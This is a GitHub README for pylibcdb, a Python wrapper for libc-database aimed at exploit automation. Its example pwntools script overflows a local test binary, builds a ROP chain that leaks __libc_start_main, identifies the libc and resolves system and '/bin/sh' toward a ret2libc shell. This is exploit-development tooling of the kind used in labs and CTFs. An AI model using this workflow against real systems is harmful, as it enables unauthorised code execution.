Skip to content
/ pylibcdb Public

libc_database python wrapper for exploit automation

License

Notifications You must be signed in to change notification settings

Neetx/pylibcdb

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

16 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

pylibcdb

pylibcdb is a python>=3.7 libc_database wrapper, its purpose is to improve exploit development tasks like ASLR bypass with an unknown libc.

With time i'd like to add more features and automated useful functions, for now this is the basic version.

Requirements

There aren't python dependeces for now, but you need to install libc_database locally.

Context

  • x86_64 Linux

Installation

git clone https://github.com/Neetx/pylibcdb
cd pylibcdb
python setup.py install

Basic usage

from pylibcdb.LibcDB import LibcDB

libcdb = LibcDB("/path/to/your/libc-database")
libc_name = libcdb.find_by_address("0x7fe7ac9a7fc0", symbol="__libc_start_main") #leaked __libc_start_main is default for symbol
print(libc_name)
libc_path = libcdb.download_by_name(libc_name)
print(libc_path)
libc6_2.31-0ubuntu9.1_amd64
/path/to/your/libc-database/libs/libc6_2.31-0ubuntu9.1_amd64/libc-2.31.so

This .so can be easily analyzed (or used with pwntools ELF()) to discovery function addresses and build a ROP chain. In this way there's no need to launch "find" and "download" scripts manually with several copy-paste.

A more detailed example

from pwn import *
from pylibcdb.LibcDB import LibcDB

p = process("./vuln_test")
elf = ELF("./vuln_test")
rop = ROP(elf)

puts = elf.plt['puts']
main = elf.symbols['main']
libc_start_main = elf.symbols['__libc_start_main']
pop_rdi = (rop.find_gadget(['pop rdi', 'ret']))[0]
ret = (rop.find_gadget(['ret']))[0]

base_payload = "A"*32 + "B"*8    #this must change for every target binary
rop = base_payload.encode() + p64(pop_rdi) + p64(libc_start_main) + p64(puts) + p64(main)

p.sendline(rop)   #this sending and receiving changes for every target binary
received = p.recvline().strip()
leak = u64(received.ljust(8, "\x00".encode()))

libcdb = LibcDB("/path/to/your/libc-database")
libc_name = libcdb.find_by_address(leak, symbol="__libc_start_main") #leaked __libc_start_main is default for symbol
libc_path = libcdb.download_by_name(libc_name)

libc = ELF(libc_path)
libc.address = leak - libc.sym["__libc_start_main"]

binsh = next(libc.search("/bin/sh".encode()))
system = libc.sym["system"]

At this point we have all we need to craft a final ROP chain and get shell. This is a workflow example in facts things may (sure) change for each scenario, but the idea is to not let target binary crashes and not stop the exploit execution to launch libc-database scripts manually.

Later I will release a complete and working example with a vulnerable binary.

Scripts

Without this library you have to launch:

./find __libc_start_main LEAKED_ADDRESS
./download LIBC_NAME_OUTPUT

And then you have to copy the shared object to your working directory or to use its absolute path.

Multiple output

Often there are multiple libc candidates, specially using only one leaked address (for now it works only in this way). Now you can choose which libc to get and use, you should make a choice second your context and information you have

Example:

[*] Leaked libc address,  __libc_start_main: 0x7f9342728b10
Select version:
1 - ubuntu-old-eglibc (libc6_2.11.1-0ubuntu7.21_i386)
2 - ubuntu-glibc (libc6_2.27-3ubuntu1.3_amd64)
3 - ubuntu-old-eglibc (libc6-i386_2.11.1-0ubuntu7.21_amd64)
4 - ubuntu-old-glibc (libc6-x32_2.21-0ubuntu4.3_amd64)
5 - ubuntu-old-glibc (libc6-x32_2.21-0ubuntu4.3_i386)
>2
NAME OF DISCOVERED LIBC: libc6_2.27-3ubuntu1.3_amd64
PATH OF DISCOVERED LIBC: /home/neetx/software/libc-database/libs/libc6_2.27-3ubuntu1.3_amd64/libc-2.27.so

Contacts

neetx

License

Copyright 2020 Neetx

This file is part of pylibcdb.

pylibcdb is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

pylibcdb is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with pylibcdb. If not, see http://www.gnu.org/licenses/.

Releases

No releases published

Packages

No packages published

Languages